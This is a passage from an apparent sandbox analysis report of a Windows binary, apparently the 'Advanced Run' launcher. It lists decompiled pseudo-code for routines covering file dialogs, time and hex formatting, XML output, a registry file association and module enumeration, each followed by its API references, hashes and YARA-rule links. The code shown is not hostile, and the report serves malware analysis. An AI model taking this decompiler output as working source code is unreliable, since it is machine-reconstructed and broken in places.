				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                        0x004036ef
                                                                                                        0x004036f6
                                                                                                        0x0040370b
                                                                                                        0x00403712
                                                                                                        0x00403717
                                                                                                        0x0040371c
                                                                                                        0x0040371f
                                                                                                        0x0040372c
                                                                                                        0x00403735
                                                                                                        0x00403738
                                                                                                        0x00403744
                                                                                                        0x00403751
                                                                                                        0x00403758
                                                                                                        0x00403760
                                                                                                        0x00403769
                                                                                                        0x0040376c
                                                                                                        0x00403778
                                                                                                        0x0040377b
                                                                                                        0x0040378b
                                                                                                        0x00403792
                                                                                                        0x00403795
                                                                                                        0x00403798
                                                                                                        0x0040379b
                                                                                                        0x004037a2
                                                                                                        0x004037a5
                                                                                                        0x004037a8
                                                                                                        0x004037af
                                                                                                        0x004037b7
                                                                                                        0x004037c3
                                                                                                        0x00000000
                                                                                                        0x004037d4
                                                                                                        0x004037dc

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004036F6
                                                                                                        • memset.MSVCRT ref: 00403712
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                          • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                          • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                          • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                          • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                          • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                          • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                          • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                          • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                        • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                        • wcscpy.MSVCRT ref: 004037C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                        • String ID: L$cfg
                                                                                                        • API String ID: 275899518-3734058911
                                                                                                        • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                        • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                        • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                        • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                        0x00404ed0
                                                                                                        0x00404edf
                                                                                                        0x00404ef6
                                                                                                        0x00000000
                                                                                                        0x00404f00
                                                                                                        0x00404f1c
                                                                                                        0x00404f31
                                                                                                        0x00404f41
                                                                                                        0x00404f4e
                                                                                                        0x00404f5d
                                                                                                        0x00404f66
                                                                                                        0x00404f69
                                                                                                        0x00404f69
                                                                                                        0x00404f71
                                                                                                        0x00404f77
                                                                                                        0x00404f7d

                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                        • wcscpy.MSVCRT ref: 00404F41
                                                                                                        • wcscat.MSVCRT ref: 00404F4E
                                                                                                        • wcscat.MSVCRT ref: 00404F5D
                                                                                                        • wcscpy.MSVCRT ref: 00404F71
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331804452-0
                                                                                                        • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                        • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                        • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                        • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                        0x00404fe0
                                                                                                        0x00404fe9
                                                                                                        0x00405000
                                                                                                        0x00405005
                                                                                                        0x00405009
                                                                                                        0x0040500c
                                                                                                        0x0040500e
                                                                                                        0x00405015
                                                                                                        0x00405016
                                                                                                        0x00405021
                                                                                                        0x00405026
                                                                                                        0x00405027
                                                                                                        0x0040502c
                                                                                                        0x00405031
                                                                                                        0x00405039
                                                                                                        0x0040503f
                                                                                                        0x00405044
                                                                                                        0x00405048
                                                                                                        0x0040504e
                                                                                                        0x00405056
                                                                                                        0x0040505c
                                                                                                        0x0040504e
                                                                                                        0x00405065
                                                                                                        0x0040506a
                                                                                                        0x00405072
                                                                                                        0x00405079

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2521778956-791839006
                                                                                                        • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                        • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                        • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                        • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                        0x00407d9c
                                                                                                        0x00407d9e
                                                                                                        0x00407da5
                                                                                                        0x00407db3
                                                                                                        0x00407dba
                                                                                                        0x00407dc5
                                                                                                        0x00407dc7
                                                                                                        0x00407dd0
                                                                                                        0x00407dc9
                                                                                                        0x00407dc9
                                                                                                        0x00407dc9
                                                                                                        0x00407dd8
                                                                                                        0x00407de1
                                                                                                        0x00407de5
                                                                                                        0x00407deb
                                                                                                        0x00407df2
                                                                                                        0x00407df3
                                                                                                        0x00407dfe
                                                                                                        0x00407e03
                                                                                                        0x00407e04
                                                                                                        0x00407e21

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                        • <%s>, xrefs: 00407DF3
                                                                                                        • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                        • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                        • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                        • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                        • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                        0x00403b56
                                                                                                        0x00403b5d
                                                                                                        0x00403b6f
                                                                                                        0x00403b76
                                                                                                        0x00403b82
                                                                                                        0x00403b8d
                                                                                                        0x00403b8e
                                                                                                        0x00403b99
                                                                                                        0x00403b9e
                                                                                                        0x00403b9f
                                                                                                        0x00403ba7
                                                                                                        0x00403bb9
                                                                                                        0x00403bce
                                                                                                        0x00403be5
                                                                                                        0x00403bef
                                                                                                        0x00403bf8
                                                                                                        0x00403c00

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403B5D
                                                                                                        • memset.MSVCRT ref: 00403B76
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                          • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                          • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                          • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                          • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                        • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                        • API String ID: 1832587304-479876776
                                                                                                        • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                        • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                        • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                        • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                        0x0040afd3
                                                                                                        0x0040afe2
                                                                                                        0x0040aff3
                                                                                                        0x0040b002
                                                                                                        0x0040b023
                                                                                                        0x00000000
                                                                                                        0x0040b047
                                                                                                        0x0040b02e
                                                                                                        0x0040b034
                                                                                                        0x0040b03c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                        • wcscat.MSVCRT ref: 0040AFE2
                                                                                                        • wcscat.MSVCRT ref: 0040AFF3
                                                                                                        • wcscat.MSVCRT ref: 0040B002
                                                                                                        • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                          • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                          • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                        • String ID: \StringFileInfo\
                                                                                                        • API String ID: 393120378-2245444037
                                                                                                        • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                        • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                        • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                        • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                        • API String ID: 999028693-502967061
                                                                                                        • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                        • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                        • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                        • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 35%
                                                                                                        			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                                                        0x004092f3
                                                                                                        0x004092fb
                                                                                                        0x00409303
                                                                                                        0x00409305
                                                                                                        0x00409310
                                                                                                        0x00409439
                                                                                                        0x0040943f
                                                                                                        0x00409445
                                                                                                        0x0040944e
                                                                                                        0x00409452
                                                                                                        0x00409466
                                                                                                        0x0040946e
                                                                                                        0x00409475
                                                                                                        0x004094f7
                                                                                                        0x00409488
                                                                                                        0x00409494
                                                                                                        0x004094a5
                                                                                                        0x004094a9
                                                                                                        0x004094b5
                                                                                                        0x004094c3
                                                                                                        0x004094c6
                                                                                                        0x004094d5
                                                                                                        0x004094e3
                                                                                                        0x004094f1
                                                                                                        0x00000000
                                                                                                        0x004094f1
                                                                                                        0x00000000
                                                                                                        0x004094e3
                                                                                                        0x00000000
                                                                                                        0x004094f7
                                                                                                        0x00409452
                                                                                                        0x00409322
                                                                                                        0x0040932b
                                                                                                        0x00409333
                                                                                                        0x00409337
                                                                                                        0x00409341
                                                                                                        0x00409342
                                                                                                        0x0040934e
                                                                                                        0x0040934f
                                                                                                        0x00409358
                                                                                                        0x0040935e
                                                                                                        0x0040935e
                                                                                                        0x00409363
                                                                                                        0x0040936b
                                                                                                        0x0040936d
                                                                                                        0x00409377
                                                                                                        0x00409385
                                                                                                        0x0040938d
                                                                                                        0x0040939d
                                                                                                        0x004093a5
                                                                                                        0x004093ac
                                                                                                        0x004093b4
                                                                                                        0x004093c5
                                                                                                        0x004093c9
                                                                                                        0x004093da
                                                                                                        0x004093df
                                                                                                        0x004093e5
                                                                                                        0x004093e6
                                                                                                        0x004093ea
                                                                                                        0x004093f6
                                                                                                        0x004093fc
                                                                                                        0x00409407
                                                                                                        0x00409407
                                                                                                        0x0040941d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409423
                                                                                                        0x00409428
                                                                                                        0x00409375
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040942e
                                                                                                        0x00000000
                                                                                                        0x00409428
                                                                                                        0x00409377
                                                                                                        0x0040936d
                                                                                                        0x004094fb
                                                                                                        0x004094ff
                                                                                                        0x004094ff
                                                                                                        0x00409337
                                                                                                        0x0040950f

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                        • memset.MSVCRT ref: 0040938D
                                                                                                        • memset.MSVCRT ref: 0040939D
                                                                                                          • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                        • memset.MSVCRT ref: 00409488
                                                                                                        • wcscpy.MSVCRT ref: 004094A9
                                                                                                        • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3300951397-0
                                                                                                        • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                        • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                        • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                        • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
